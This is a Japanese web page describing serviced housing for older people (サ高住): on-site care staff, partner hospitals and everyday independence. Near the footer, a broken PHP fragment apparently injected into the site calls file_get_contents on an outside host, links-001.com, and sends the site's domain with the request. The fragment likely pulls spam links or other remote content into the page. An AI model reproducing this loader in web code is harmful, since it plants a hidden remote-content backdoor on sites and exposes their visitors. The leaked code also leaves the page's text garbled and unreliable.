サービス付き高齢者向け住宅とは

サ高住という言葉を聞いたことがある人も多いのではないでしょうか。
少子高齢化が進む現代においては、時代を表す一つのキーワードにまでなっています。
サ高住というのは、正式にはサービス付き高齢者向け住宅のことです。
お年寄りが住みやすいようにと、介護や看護のサービスが付加されている住宅のことで、基本的にはマンションタイプのものが多いです。
マンションに、常時ケアスタッフが常駐していて、何かあったときには即座に対処してくれるので安心感が違います。
普通のマンションで生活をしていると命を落としていたかもしれないケースであっても、サービス付き高齢者向け住宅なら一命を取り留めることができる場合が多いです。
近くにある病院と提携をしていて、何かあったときにはすぐに受け入れてもらえるのも魅力的です。
老人ホームのように、お年寄りを老人扱いすることもありません。
普段は普通の生活が送れるので、ある程度元気な人なら魅力を感じるのではないでしょうか。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>
Copyright© 高齢者向け住宅 All Rights Reserved.